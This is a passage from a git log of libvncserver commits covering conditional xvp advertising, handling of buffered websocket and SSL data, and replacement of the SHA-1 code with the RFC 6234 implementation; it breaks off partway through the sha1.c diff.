From a48035a1ce6b5fa9738e9f1762294ddfe52b8d57 Mon Sep 17 00:00:00 2001 From: Floris Bos Date: Fri, 16 Jan 2015 15:54:39 +0100 Subject: Only advertise xvp support when xvpHook is set Prevent that clients show "reboot" "power down" buttons that are not going to work. Signed-off-by: Floris Bos --- libvncserver/rfbserver.c | 23 ++++++++++++++--------- 1 file changed, 14 insertions(+), 9 deletions(-) (limited to 'libvncserver') diff --git a/libvncserver/rfbserver.c b/libvncserver/rfbserver.c index f1c7c94..b2532e3 100644 --- a/libvncserver/rfbserver.c +++ b/libvncserver/rfbserver.c @@ -953,7 +953,6 @@ rfbSendSupportedMessages(rfbClientPtr cl) /*rfbSetBit(msgs.client2server, rfbSetSW); */ /*rfbSetBit(msgs.client2server, rfbTextChat); */ rfbSetBit(msgs.client2server, rfbPalmVNCSetScaleFactor); - rfbSetBit(msgs.client2server, rfbXvp); rfbSetBit(msgs.server2client, rfbFramebufferUpdate); rfbSetBit(msgs.server2client, rfbSetColourMapEntries); @@ -961,7 +960,11 @@ rfbSendSupportedMessages(rfbClientPtr cl) rfbSetBit(msgs.server2client, rfbServerCutText); rfbSetBit(msgs.server2client, rfbResizeFrameBuffer); rfbSetBit(msgs.server2client, rfbPalmVNCReSizeFrameBuffer); - rfbSetBit(msgs.server2client, rfbXvp); + + if (cl->screen->xvpHook) { + rfbSetBit(msgs.client2server, rfbXvp); + rfbSetBit(msgs.server2client, rfbXvp); + } memcpy(&cl->updateBuf[cl->ublen], (char *)&msgs, sz_rfbSupportedMessages); cl->ublen += sz_rfbSupportedMessages; @@ -2214,13 +2217,15 @@ rfbProcessClientNormalMessage(rfbClientPtr cl) cl->enableServerIdentity = TRUE; } break; - case rfbEncodingXvp: - rfbLog("Enabling Xvp protocol extension for client " - "%s\n", cl->host); - if (!rfbSendXvp(cl, 1, rfbXvp_Init)) { - rfbCloseClient(cl); - return; - } + case rfbEncodingXvp: + if (cl->screen->xvpHook) { + rfbLog("Enabling Xvp protocol extension for client " + "%s\n", cl->host); + if (!rfbSendXvp(cl, 1, rfbXvp_Init)) { + rfbCloseClient(cl); + return; + } + } break; default: #if defined(LIBVNCSERVER_HAVE_LIBZ) || defined(LIBVNCSERVER_HAVE_LIBPNG) -- cgit v1.2.3 From 6836ccb208f8c16824b8c1e330acb077c70c98c6 Mon Sep 17 00:00:00 2001 From: Floris Bos Date: Sat, 17 Jan 2015 22:49:48 +0100 Subject: Fix handling of multiple VNC commands per websockets frame - When processing input, check if there is any extra data pending in the internal websocket frame and SSL buffers. - Prevents input events lagging behind because they get stuck in one of the buffers. Data pending in our own buffers cannot be detected with select() so was not processed until more input arrives from the network. - Closes # 55 Signed-off-by: Floris Bos --- libvncserver/main.c | 8 ++++++++ libvncserver/sockets.c | 8 ++++++++ libvncserver/websockets.c | 13 +++++++++++++ rfb/rfb.h | 1 + 4 files changed, 30 insertions(+) (limited to 'libvncserver') diff --git a/libvncserver/main.c b/libvncserver/main.c index 9839c85..a8458e4 100644 --- a/libvncserver/main.c +++ b/libvncserver/main.c @@ -550,7 +550,15 @@ clientInput(void *data) rfbSendFileTransferChunk(cl); if (FD_ISSET(cl->sock, &rfds) || FD_ISSET(cl->sock, &efds)) + { +#ifdef LIBVNCSERVER_WITH_WEBSOCKETS + do { + rfbProcessClientMessage(cl); + } while (webSocketsHasDataInBuffer(cl)); +#else rfbProcessClientMessage(cl); +#endif + } } /* Get rid of the output thread. */ diff --git a/libvncserver/sockets.c b/libvncserver/sockets.c index a9c5a2c..2bb655e 100644 --- a/libvncserver/sockets.c +++ b/libvncserver/sockets.c @@ -391,7 +391,15 @@ rfbCheckFds(rfbScreenInfoPtr rfbScreen,long usec) if (FD_ISSET(cl->sock, &(rfbScreen->allFds))) { if (FD_ISSET(cl->sock, &fds)) + { +#ifdef LIBVNCSERVER_WITH_WEBSOCKETS + do { + rfbProcessClientMessage(cl); + } while (webSocketsHasDataInBuffer(cl)); +#else rfbProcessClientMessage(cl); +#endif + } else rfbSendFileTransferChunk(cl); } diff --git a/libvncserver/websockets.c b/libvncserver/websockets.c index 34f04d7..3585ed5 100644 --- a/libvncserver/websockets.c +++ b/libvncserver/websockets.c @@ -905,3 +905,16 @@ webSocketCheckDisconnect(rfbClientPtr cl) return FALSE; } +/* returns TRUE if there is data waiting to be read in our internal buffer + * or if is there any pending data in the buffer of the SSL implementation + */ +rfbBool +webSocketsHasDataInBuffer(rfbClientPtr cl) +{ + ws_ctx_t *wsctx = (ws_ctx_t *)cl->wsctx; + + if (wsctx && wsctx->readbuflen) + return TRUE; + + return (cl->sslctx && rfbssl_pending(cl) > 0); +} diff --git a/rfb/rfb.h b/rfb/rfb.h index f7919c6..0c34d74 100644 --- a/rfb/rfb.h +++ b/rfb/rfb.h @@ -765,6 +765,7 @@ extern rfbBool webSocketsCheck(rfbClientPtr cl); extern rfbBool webSocketCheckDisconnect(rfbClientPtr cl); extern int webSocketsEncode(rfbClientPtr cl, const char *src, int len, char **dst); extern int webSocketsDecode(rfbClientPtr cl, char *dst, int len); +extern rfbBool webSocketsHasDataInBuffer(rfbClientPtr cl); #endif /* rfbserver.c */ -- cgit v1.2.3 From 99bd5d7ca48dec0a4c1aca4cdbe7b5fb2bea2bbf Mon Sep 17 00:00:00 2001 From: Christian Beier Date: Sun, 1 Feb 2015 18:13:52 +0100 Subject: Replace SHA1 implementation with the one from RFC 6234. --- common/sha-private.h | 29 ++ common/sha.h | 358 +++++++++++++++++++++ common/sha1.c | 653 +++++++++++++++++++------------------- common/sha1.h | 101 ------ libvncserver/Makefile.am | 2 +- libvncserver/rfbcrypto_included.c | 2 +- 6 files changed, 717 insertions(+), 428 deletions(-) create mode 100644 common/sha-private.h create mode 100644 common/sha.h delete mode 100644 common/sha1.h (limited to 'libvncserver') diff --git a/common/sha-private.h b/common/sha-private.h new file mode 100644 index 0000000..9ccc8dd --- /dev/null +++ b/common/sha-private.h @@ -0,0 +1,29 @@ +/************************ sha-private.h ************************/ +/***************** See RFC 6234 for details. *******************/ +#ifndef _SHA_PRIVATE__H +#define _SHA_PRIVATE__H +/* + * These definitions are defined in FIPS 180-3, section 4.1. + * Ch() and Maj() are defined identically in sections 4.1.1, + * 4.1.2, and 4.1.3. + * + * The definitions used in FIPS 180-3 are as follows: + */ + +#ifndef USE_MODIFIED_MACROS +#define SHA_Ch(x,y,z) (((x) & (y)) ^ ((~(x)) & (z))) +#define SHA_Maj(x,y,z) (((x) & (y)) ^ ((x) & (z)) ^ ((y) & (z))) +#else /* USE_MODIFIED_MACROS */ +/* + * The following definitions are equivalent and potentially faster. + */ + +#define SHA_Ch(x, y, z) (((x) & ((y) ^ (z))) ^ (z)) +#define SHA_Maj(x, y, z) (((x) & ((y) | (z))) | ((y) & (z))) + +#endif /* USE_MODIFIED_MACROS */ + +#define SHA_Parity(x, y, z) ((x) ^ (y) ^ (z)) + +#endif /* _SHA_PRIVATE__H */ + diff --git a/common/sha.h b/common/sha.h new file mode 100644 index 0000000..276c368 --- /dev/null +++ b/common/sha.h @@ -0,0 +1,358 @@ +/**************************** sha.h ****************************/ +/***************** See RFC 6234 for details. *******************/ +/* + Copyright (c) 2011 IETF Trust and the persons identified as + authors of the code. All rights reserved. + + Redistribution and use in source and binary forms, with or + without modification, are permitted provided that the following + conditions are met: + + - Redistributions of source code must retain the above + copyright notice, this list of conditions and + the following disclaimer. + + - Redistributions in binary form must reproduce the above + copyright notice, this list of conditions and the following + disclaimer in the documentation and/or other materials provided + with the distribution. + + - Neither the name of Internet Society, IETF or IETF Trust, nor + the names of specific contributors, may be used to endorse or + promote products derived from this software without specific + prior written permission. + + THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND + CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, + INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF + MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR + CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, + SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT + NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; + LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) + HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN + CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR + OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, + EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. +*/ +#ifndef _SHA_H_ +#define _SHA_H_ + +/* + * Description: + * This file implements the Secure Hash Algorithms + * as defined in the U.S. National Institute of Standards + * and Technology Federal Information Processing Standards + * Publication (FIPS PUB) 180-3 published in October 2008 + * and formerly defined in its predecessors, FIPS PUB 180-1 + * and FIP PUB 180-2. + * + * A combined document showing all algorithms is available at + * http://csrc.nist.gov/publications/fips/ + * fips180-3/fips180-3_final.pdf + * + * The five hashes are defined in these sizes: + * SHA-1 20 byte / 160 bit + * SHA-224 28 byte / 224 bit + * SHA-256 32 byte / 256 bit + * SHA-384 48 byte / 384 bit + * SHA-512 64 byte / 512 bit + * + * Compilation Note: + * These files may be compiled with two options: + * USE_32BIT_ONLY - use 32-bit arithmetic only, for systems + * without 64-bit integers + * + * USE_MODIFIED_MACROS - use alternate form of the SHA_Ch() + * and SHA_Maj() macros that are equivalent + * and potentially faster on many systems + * + */ + +#include +/* + * If you do not have the ISO standard stdint.h header file, then you + * must typedef the following: + * name meaning + * uint64_t unsigned 64-bit integer + * uint32_t unsigned 32-bit integer + * uint8_t unsigned 8-bit integer (i.e., unsigned char) + * int_least16_t integer of >= 16 bits + * + * See stdint-example.h + */ + +#ifndef _SHA_enum_ +#define _SHA_enum_ +/* + * All SHA functions return one of these values. + */ +enum { + shaSuccess = 0, + shaNull, /* Null pointer parameter */ + shaInputTooLong, /* input data too long */ + shaStateError, /* called Input after FinalBits or Result */ + shaBadParam /* passed a bad parameter */ +}; +#endif /* _SHA_enum_ */ + +/* + * These constants hold size information for each of the SHA + * hashing operations + */ +enum { + SHA1_Message_Block_Size = 64, SHA224_Message_Block_Size = 64, + SHA256_Message_Block_Size = 64, SHA384_Message_Block_Size = 128, + SHA512_Message_Block_Size = 128, + USHA_Max_Message_Block_Size = SHA512_Message_Block_Size, + + SHA1HashSize = 20, SHA224HashSize = 28, SHA256HashSize = 32, + SHA384HashSize = 48, SHA512HashSize = 64, + USHAMaxHashSize = SHA512HashSize, + + SHA1HashSizeBits = 160, SHA224HashSizeBits = 224, + SHA256HashSizeBits = 256, SHA384HashSizeBits = 384, + SHA512HashSizeBits = 512, USHAMaxHashSizeBits = SHA512HashSizeBits +}; + +/* + * These constants are used in the USHA (Unified SHA) functions. + */ +typedef enum SHAversion { + SHA1, SHA224, SHA256, SHA384, SHA512 +} SHAversion; + +/* + * This structure will hold context information for the SHA-1 + * hashing operation. + */ +typedef struct SHA1Context { + uint32_t Intermediate_Hash[SHA1HashSize/4]; /* Message Digest */ + + uint32_t Length_High; /* Message length in bits */ + uint32_t Length_Low; /* Message length in bits */ + + int_least16_t Message_Block_Index; /* Message_Block array index */ + /* 512-bit message blocks */ + uint8_t Message_Block[SHA1_Message_Block_Size]; + + int Computed; /* Is the hash computed? */ + int Corrupted; /* Cumulative corruption code */ +} SHA1Context; + +/* + * This structure will hold context information for the SHA-256 + * hashing operation. + */ +typedef struct SHA256Context { + uint32_t Intermediate_Hash[SHA256HashSize/4]; /* Message Digest */ + + uint32_t Length_High; /* Message length in bits */ + uint32_t Length_Low; /* Message length in bits */ + + int_least16_t Message_Block_Index; /* Message_Block array index */ + /* 512-bit message blocks */ + uint8_t Message_Block[SHA256_Message_Block_Size]; + + int Computed; /* Is the hash computed? */ + int Corrupted; /* Cumulative corruption code */ +} SHA256Context; + +/* + * This structure will hold context information for the SHA-512 + * hashing operation. + */ +typedef struct SHA512Context { +#ifdef USE_32BIT_ONLY + uint32_t Intermediate_Hash[SHA512HashSize/4]; /* Message Digest */ + uint32_t Length[4]; /* Message length in bits */ +#else /* !USE_32BIT_ONLY */ + uint64_t Intermediate_Hash[SHA512HashSize/8]; /* Message Digest */ + uint64_t Length_High, Length_Low; /* Message length in bits */ +#endif /* USE_32BIT_ONLY */ + + int_least16_t Message_Block_Index; /* Message_Block array index */ + /* 1024-bit message blocks */ + uint8_t Message_Block[SHA512_Message_Block_Size]; + + int Computed; /* Is the hash computed?*/ + int Corrupted; /* Cumulative corruption code */ +} SHA512Context; + +/* + * This structure will hold context information for the SHA-224 + * hashing operation. It uses the SHA-256 structure for computation. + */ +typedef struct SHA256Context SHA224Context; + +/* + * This structure will hold context information for the SHA-384 + * hashing operation. It uses the SHA-512 structure for computation. + */ +typedef struct SHA512Context SHA384Context; + +/* + * This structure holds context information for all SHA + * hashing operations. + */ +typedef struct USHAContext { + int whichSha; /* which SHA is being used */ + union { + SHA1Context sha1Context; + SHA224Context sha224Context; SHA256Context sha256Context; + SHA384Context sha384Context; SHA512Context sha512Context; + } ctx; + +} USHAContext; + +/* + * This structure will hold context information for the HMAC + * keyed-hashing operation. + */ +typedef struct HMACContext { + int whichSha; /* which SHA is being used */ + int hashSize; /* hash size of SHA being used */ + int blockSize; /* block size of SHA being used */ + USHAContext shaContext; /* SHA context */ + unsigned char k_opad[USHA_Max_Message_Block_Size]; + /* outer padding - key XORd with opad */ + int Computed; /* Is the MAC computed? */ + int Corrupted; /* Cumulative corruption code */ + +} HMACContext; + +/* + * This structure will hold context information for the HKDF + * extract-and-expand Key Derivation Functions. + */ +typedef struct HKDFContext { + int whichSha; /* which SHA is being used */ + HMACContext hmacContext; + int hashSize; /* hash size of SHA being used */ + unsigned char prk[USHAMaxHashSize]; + /* pseudo-random key - output of hkdfInput */ + int Computed; /* Is the key material computed? */ + int Corrupted; /* Cumulative corruption code */ +} HKDFContext; + +/* + * Function Prototypes + */ + +/* SHA-1 */ +extern int SHA1Reset(SHA1Context *); +extern int SHA1Input(SHA1Context *, const uint8_t *bytes, + unsigned int bytecount); +extern int SHA1FinalBits(SHA1Context *, uint8_t bits, + unsigned int bit_count); +extern int SHA1Result(SHA1Context *, + uint8_t Message_Digest[SHA1HashSize]); + +/* SHA-224 */ +extern int SHA224Reset(SHA224Context *); +extern int SHA224Input(SHA224Context *, const uint8_t *bytes, + unsigned int bytecount); +extern int SHA224FinalBits(SHA224Context *, uint8_t bits, + unsigned int bit_count); +extern int SHA224Result(SHA224Context *, + uint8_t Message_Digest[SHA224HashSize]); + +/* SHA-256 */ +extern int SHA256Reset(SHA256Context *); +extern int SHA256Input(SHA256Context *, const uint8_t *bytes, + unsigned int bytecount); +extern int SHA256FinalBits(SHA256Context *, uint8_t bits, + unsigned int bit_count); +extern int SHA256Result(SHA256Context *, + uint8_t Message_Digest[SHA256HashSize]); + +/* SHA-384 */ +extern int SHA384Reset(SHA384Context *); +extern int SHA384Input(SHA384Context *, const uint8_t *bytes, + unsigned int bytecount); +extern int SHA384FinalBits(SHA384Context *, uint8_t bits, + unsigned int bit_count); +extern int SHA384Result(SHA384Context *, + uint8_t Message_Digest[SHA384HashSize]); + +/* SHA-512 */ +extern int SHA512Reset(SHA512Context *); +extern int SHA512Input(SHA512Context *, const uint8_t *bytes, + unsigned int bytecount); +extern int SHA512FinalBits(SHA512Context *, uint8_t bits, + unsigned int bit_count); +extern int SHA512Result(SHA512Context *, + uint8_t Message_Digest[SHA512HashSize]); + +/* Unified SHA functions, chosen by whichSha */ +extern int USHAReset(USHAContext *context, SHAversion whichSha); +extern int USHAInput(USHAContext *context, + const uint8_t *bytes, unsigned int bytecount); +extern int USHAFinalBits(USHAContext *context, + uint8_t bits, unsigned int bit_count); +extern int USHAResult(USHAContext *context, + uint8_t Message_Digest[USHAMaxHashSize]); +extern int USHABlockSize(enum SHAversion whichSha); +extern int USHAHashSize(enum SHAversion whichSha); +extern int USHAHashSizeBits(enum SHAversion whichSha); +extern const char *USHAHashName(enum SHAversion whichSha); + +/* + * HMAC Keyed-Hashing for Message Authentication, RFC 2104, + * for all SHAs. + * This interface allows a fixed-length text input to be used. + */ +extern int hmac(SHAversion whichSha, /* which SHA algorithm to use */ + const unsigned char *text, /* pointer to data stream */ + int text_len, /* length of data stream */ + const unsigned char *key, /* pointer to authentication key */ + int key_len, /* length of authentication key */ + uint8_t digest[USHAMaxHashSize]); /* caller digest to fill in */ + +/* + * HMAC Keyed-Hashing for Message Authentication, RFC 2104, + * for all SHAs. + * This interface allows any length of text input to be used. + */ +extern int hmacReset(HMACContext *context, enum SHAversion whichSha, + const unsigned char *key, int key_len); +extern int hmacInput(HMACContext *context, const unsigned char *text, + int text_len); +extern int hmacFinalBits(HMACContext *context, uint8_t bits, + unsigned int bit_count); +extern int hmacResult(HMACContext *context, + uint8_t digest[USHAMaxHashSize]); + +/* + * HKDF HMAC-based Extract-and-Expand Key Derivation Function, + * RFC 5869, for all SHAs. + */ +extern int hkdf(SHAversion whichSha, const unsigned char *salt, + int salt_len, const unsigned char *ikm, int ikm_len, + const unsigned char *info, int info_len, + uint8_t okm[ ], int okm_len); +extern int hkdfExtract(SHAversion whichSha, const unsigned char *salt, + int salt_len, const unsigned char *ikm, + int ikm_len, uint8_t prk[USHAMaxHashSize]); +extern int hkdfExpand(SHAversion whichSha, const uint8_t prk[ ], + int prk_len, const unsigned char *info, + int info_len, uint8_t okm[ ], int okm_len); + +/* + * HKDF HMAC-based Extract-and-Expand Key Derivation Function, + * RFC 5869, for all SHAs. + * This interface allows any length of text input to be used. + */ +extern int hkdfReset(HKDFContext *context, enum SHAversion whichSha, + const unsigned char *salt, int salt_len); +extern int hkdfInput(HKDFContext *context, const unsigned char *ikm, + int ikm_len); +extern int hkdfFinalBits(HKDFContext *context, uint8_t ikm_bits, + unsigned int ikm_bit_count); +extern int hkdfResult(HKDFContext *context, + uint8_t prk[USHAMaxHashSize], + const unsigned char *info, int info_len, + uint8_t okm[USHAMaxHashSize], int okm_len); +#endif /* _SHA_H_ */ + diff --git a/common/sha1.c b/common/sha1.c index 988b188..53f1872 100644 --- a/common/sha1.c +++ b/common/sha1.c @@ -1,73 +1,66 @@ -/* - * Copyright (C) The Internet Society (2001). All Rights Reserved. - * - * This document and translations of it may be copied and furnished to - * others, and derivative works that comment on or otherwise explain it - * or assist in its implementation may be prepared, copied, published - * and distributed, in whole or in part, without restriction of any - * kind, provided that the above copyright notice and this paragraph are - * included on all such copies and derivative works. However, this - * document itself may not be modified in any way, such as by removing - * the copyright notice or references to the Internet Society or other - * Internet organizations, except as needed for the purpose of - * developing Internet standards in which case the procedures for - * copyrights defined in the Internet Standards process must be - * followed, or as required to translate it into languages other than - * English. - * - * The limited permissions granted above are perpetual and will not be - * revoked by the Internet Society or its successors or assigns. - * - * This document and the information contained herein is provided on an - * "AS IS" basis and THE INTERNET SOCIETY AND THE INTERNET ENGINEERING - * TASK FORCE DISCLAIMS ALL WARRANTIES, EXPRESS OR IMPLIED, INCLUDING - * BUT NOT LIMITED TO ANY WARRANTY THAT THE USE OF THE INFORMATION - * HEREIN WILL NOT INFRINGE ANY RIGHTS OR ANY IMPLIED WARRANTIES OF - * MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE. - */ +/**************************** sha1.c ***************************/ +/***************** See RFC 6234 for details. *******************/ +/* Copyright (c) 2011 IETF Trust and the persons identified as */ +/* authors of the code. All rights reserved. */ +/* See sha.h for terms of use and redistribution. */ /* - * sha1.c - * * Description: - * This file implements the Secure Hashing Algorithm 1 as - * defined in FIPS PUB 180-1 published April 17, 1995. + * This file implements the Secure Hash Algorithm SHA-1 + * as defined in the U.S. National Institute of Standards + * and Technology Federal Information Processing Standards + * Publication (FIPS PUB) 180-3 published in October 2008 + * and formerly defined in its predecessors, FIPS PUB 180-1 + * and FIP PUB 180-2. * - * The SHA-1, produces a 160-bit message digest for a given - * data stream. It should take about 2**n steps to find a - * message with the same digest as a given message and - * 2**(n/2) to find any two messages with the same digest, - * when n is the digest size in bits. Therefore, this - * algorithm can serve as a means of providing a + * A combined document showing all algorithms is available at + * http://csrc.nist.gov/publications/fips/ + * fips180-3/fips180-3_final.pdf + * + * The SHA-1 algorithm produces a 160-bit message digest for a + * given data stream that can serve as a means of providing a * "fingerprint" for a message. * * Portability Issues: * SHA-1 is defined in terms of 32-bit "words". This code - * uses (included via "sha1.h" to define 32 and 8 - * bit unsigned integer types. If your C compiler does not - * support 32 bit unsigned integers, this code is not + * uses (included via "sha.h") to define 32- and + * 8-bit unsigned integer types. If your C compiler does + * not support 32-bit unsigned integers, this code is not * appropriate. * * Caveats: * SHA-1 is designed to work with messages less than 2^64 bits - * long. Although SHA-1 allows a message digest to be generated - * for messages of any number of bits less than 2^64, this - * implementation only works with messages with a length that is - * a multiple of the size of an 8-bit character. - * + * long. This implementation uses SHA1Input() to hash the bits + * that are a multiple of the size of an 8-bit octet, and then + * optionally uses SHA1FinalBits() to hash the final few bits of + * the input. */ -#include "sha1.h" +#include "sha.h" +#include "sha-private.h" /* * Define the SHA1 circular left shift macro */ -#define SHA1CircularShift(bits,word) \ +#define SHA1_ROTL(bits,word) \ (((word) << (bits)) | ((word) >> (32-(bits)))) -/* Local Function Prototyptes */ -void SHA1PadMessage(SHA1Context *); -void SHA1ProcessMessageBlock(SHA1Context *); +/* + * Add "length" to the length. + * Set Corrupted when overflow has occurred. + */ +static uint32_t addTemp; +#define SHA1AddLength(context, length) \ + (addTemp = (context)->Length_Low, \ + (context)->Corrupted = \ + (((context)->Length_Low += (length)) < addTemp) && \ + (++(context)->Length_High == 0) ? shaInputTooLong \ + : (context)->Corrupted ) + +/* Local Function Prototypes */ +static void SHA1ProcessMessageBlock(SHA1Context *context); +static void SHA1Finalize(SHA1Context *context, uint8_t Pad_Byte); +static void SHA1PadMessage(SHA1Context *context, uint8_t Pad_Byte); /* * SHA1Reset @@ -86,80 +79,22 @@ void SHA1ProcessMessageBlock(SHA1Context *); */ int SHA1Reset(SHA1Context *context) { - if (!context) - { - return shaNull; - } - - context->Length_Low = 0; - context->Length_High = 0; - context->Message_Block_Index = 0; - - context->Intermediate_Hash[0] = 0x67452301; - context->Intermediate_Hash[1] = 0xEFCDAB89; - context->Intermediate_Hash[2] = 0x98BADCFE; - context->Intermediate_Hash[3] = 0x10325476; - context->Intermediate_Hash[4] = 0xC3D2E1F0; - - context->Computed = 0; - context->Corrupted = 0; - return shaSuccess; -} + if (!context) return shaNull; -/* - * SHA1Result - * - * Description: - * This function will return the 160-bit message digest into the - * Message_Digest array provided by the caller. - * NOTE: The first octet of hash is stored in the 0th element, - * the last octet of hash in the 19th element. - * - * Parameters: - * context: [in/out] - * The context to use to calculate the SHA-1 hash. - * Message_Digest: [out] - * Where the digest is returned. - * - * Returns: - * sha Error Code. - * - */ -int SHA1Result( SHA1Context *context, - uint8_t Message_Digest[SHA1HashSize]) -{ - int i; - - if (!context || !Message_Digest) - { - return shaNull; - } - - if (context->Corrupted) - { - return context->Corrupted; - } - - if (!context->Computed) - { - SHA1PadMessage(context); - for(i=0; i<64; ++i) - { - /* message may be sensitive, clear it out */ - context->Message_Block[i] = 0; - } - context->Length_Low = 0; /* and clear length */ - context->Length_High = 0; - context->Computed = 1; - } - - for(i = 0; i < SHA1HashSize; ++i) - { - Message_Digest[i] = context->Intermediate_Hash[i>>2] - >> 8 * ( 3 - ( i & 0x03 ) ); - } - - return shaSuccess; + context->Length_High = context->Length_Low = 0; + context->Message_Block_Index = 0; + + /* Initial Hash Values: FIPS 180-3 section 5.3.1 */ + context->Intermediate_Hash[0] = 0x67452301; + context->Intermediate_Hash[1] = 0xEFCDAB89; + context->Intermediate_Hash[2] = 0x98BADCFE; + context->Intermediate_Hash[3] = 0x10325476; + context->Intermediate_Hash[4] = 0xC3D2E1F0; + + context->Computed = 0; + context->Corrupted = shaSuccess; + + return shaSuccess; } /* @@ -171,241 +106,309 @@ int SHA1Result( SHA1Context *context, * * Parameters: * context: [in/out] - * The SHA context to update - * message_array: [in] - * An array of characters representing the next portion of + * The SHA context to update. + * message_array[ ]: [in] + * An array of octets representing the next portion of * the message. * length: [in] - * The length of the message in message_array + * The length of the message in message_array. * * Returns: * sha Error Code. * */ -int SHA1Input( SHA1Context *context, - const uint8_t *message_array, - unsigned length) +int SHA1Input(SHA1Context *context, + const uint8_t *message_array, unsigned length) { - if (!length) - { - return shaSuccess; - } - - if (!context || !message_array) - { - return shaNull; - } - - if (context->Computed) - { - context->Corrupted = shaStateError; - return shaStateError; - } - - if (context->Corrupted) - { - return context->Corrupted; - } - while(length-- && !context->Corrupted) - { + if (!context) return shaNull; + if (!length) return shaSuccess; + if (!message_array) return shaNull; + if (context->Computed) return context->Corrupted = shaStateError; + if (context->Corrupted) return context->Corrupted; + + while (length--) { context->Message_Block[context->Message_Block_Index++] = - (*message_array & 0xFF); - - context->Length_Low += 8; - if (context->Length_Low == 0) - { - context->Length_High++; - if (context->Length_High == 0) - { - /* Message is too long */ - context->Corrupted = 1; - } - } - - if (context->Message_Block_Index == 64) - { - SHA1ProcessMessageBlock(context); - } + *message_array; + + if ((SHA1AddLength(context, 8) == shaSuccess) && + (context->Message_Block_Index == SHA1_Message_Block_Size)) + SHA1ProcessMessageBlock(context); message_array++; - } + } - return shaSuccess; + return context->Corrupted; } /* - * SHA1ProcessMessageBlock + * SHA1FinalBits * - * Description: - * This function will process the next 512 bits of the message - * stored in the Message_Block array. + * Description: + * This function will add in any final bits of the message. * - * Parameters: - * None. + * Parameters: + * context: [in/out] + * The SHA context to update. + * message_bits: [in] + * The final bits of the message, in the upper portion of the + * byte. (Use 0b###00000 instead of 0b00000### to input the + * three bits ###.) + * length: [in] + * The number of bits in message_bits, between 1 and 7. * - * Returns: - * Nothing. + * Returns: + * sha Error Code. + */ +int SHA1FinalBits(SHA1Context *context, uint8_t message_bits, + unsigned int length) +{ + static uint8_t masks[8] = { + /* 0 0b00000000 */ 0x00, /* 1 0b10000000 */ 0x80, + /* 2 0b11000000 */ 0xC0, /* 3 0b11100000 */ 0xE0, + /* 4 0b11110000 */ 0xF0, /* 5 0b11111000 */ 0xF8, + /* 6 0b11111100 */ 0xFC, /* 7 0b11111110 */ 0xFE + }; + + static uint8_t markbit[8] = { + /* 0 0b10000000 */ 0x80, /* 1 0b01000000 */ 0x40, + /* 2 0b00100000 */ 0x20, /* 3 0b00010000 */ 0x10, + /* 4 0b00001000 */ 0x08, /* 5 0b00000100 */ 0x04, + /* 6 0b00000010 */ 0x02, /* 7 0b00000001 */ 0x01 + }; + + if (!context) return shaNull; + if (!length) return shaSuccess; + if (context->Corrupted) return context->Corrupted; + if (context->Computed) return context->Corrupted = shaStateError; + if (length >= 8) return context->Corrupted = shaBadParam; + + SHA1AddLength(context, length); + SHA1Finalize(context, + (uint8_t) ((message_bits & masks[length]) | markbit[length])); + + return context->Corrupted; +} + +/* + * SHA1Result + * + * Description: + * This function will return the 160-bit message digest + * into the Message_Digest array provided by the caller. + * NOTE: + * The first octet of hash is stored in the element with index 0, + * the last octet of hash in the element with index 19. * - * Comments: - * Many of the variable names in this code, especially the - * single character names, were used because those were the - * names used in the publication. + * Parameters: + * context: [in/out] + * The context to use to calculate the SHA-1 hash. + * Message_Digest[ ]: [out] + * Where the digest is returned. * + * Returns: + * sha Error Code. * */ -void SHA1ProcessMessageBlock(SHA1Context *context) +int SHA1Result(SHA1Context *context, + uint8_t Message_Digest[SHA1HashSize]) { - const uint32_t K[] = { /* Constants defined in SHA-1 */ - 0x5A827999, - 0x6ED9EBA1, - 0x8F1BBCDC, - 0xCA62C1D6 - }; - int t; /* Loop counter */ - uint32_t temp; /* Temporary word value */ - uint32_t W[80]; /* Word sequence */ - uint32_t A, B, C, D, E; /* Word buffers */ - - /* - * Initialize the first 16 words in the array W - */ - for(t = 0; t < 16; t++) - { - W[t] = context->Message_Block[t * 4] << 24; - W[t] |= context->Message_Block[t * 4 + 1] << 16; - W[t] |= context->Message_Block[t * 4 + 2] << 8; - W[t] |= context->Message_Block[t * 4 + 3]; - } - - for(t = 16; t < 80; t++) - { - W[t] = SHA1CircularShift(1,W[t-3] ^ W[t-8] ^ W[t-14] ^ W[t-16]); - } - - A = context->Intermediate_Hash[0]; - B = context->Intermediate_Hash[1]; - C = context->Intermediate_Hash[2]; - D = context->Intermediate_Hash[3]; - E = context->Intermediate_Hash[4]; - - for(t = 0; t < 20; t++) - { - temp = SHA1CircularShift(5,A) + - ((B & C) | ((~B) & D)) + E + W[t] + K[0]; - E = D; - D = C; - C = SHA1CircularShift(30,B); - B = A; - A = temp; - } - - for(t = 20; t < 40; t++) - { - temp = SHA1CircularShift(5,A) + (B ^ C ^ D) + E + W[t] + K[1]; - E = D; - D = C; - C = SHA1CircularShift(30,B); - B = A; - A = temp; - } - - for(t = 40; t < 60; t++) - { - temp = SHA1CircularShift(5,A) + - ((B & C) | (B & D) | (C & D)) + E + W[t] + K[2]; - E = D; - D = C; - C = SHA1CircularShift(30,B); - B = A; - A = temp; - } - - for(t = 60; t < 80; t++) - { - temp = SHA1CircularShift(5,A) + (B ^ C ^ D) + E + W[t] + K[3]; - E = D; - D = C; - C = SHA1CircularShift(30,B); - B = A; - A = temp; - } - - context->Intermediate_Hash[0] += A; - context->Intermediate_Hash[1] += B; - context->Intermediate_Hash[2] += C; - context->Intermediate_Hash[3] += D; - context->Intermediate_Hash[4] += E; - - context->Message_Block_Index = 0; + int i; + + if (!context) return shaNull; + if (!Message_Digest) return shaNull; + if (context->Corrupted) return context->Corrupted; + + if 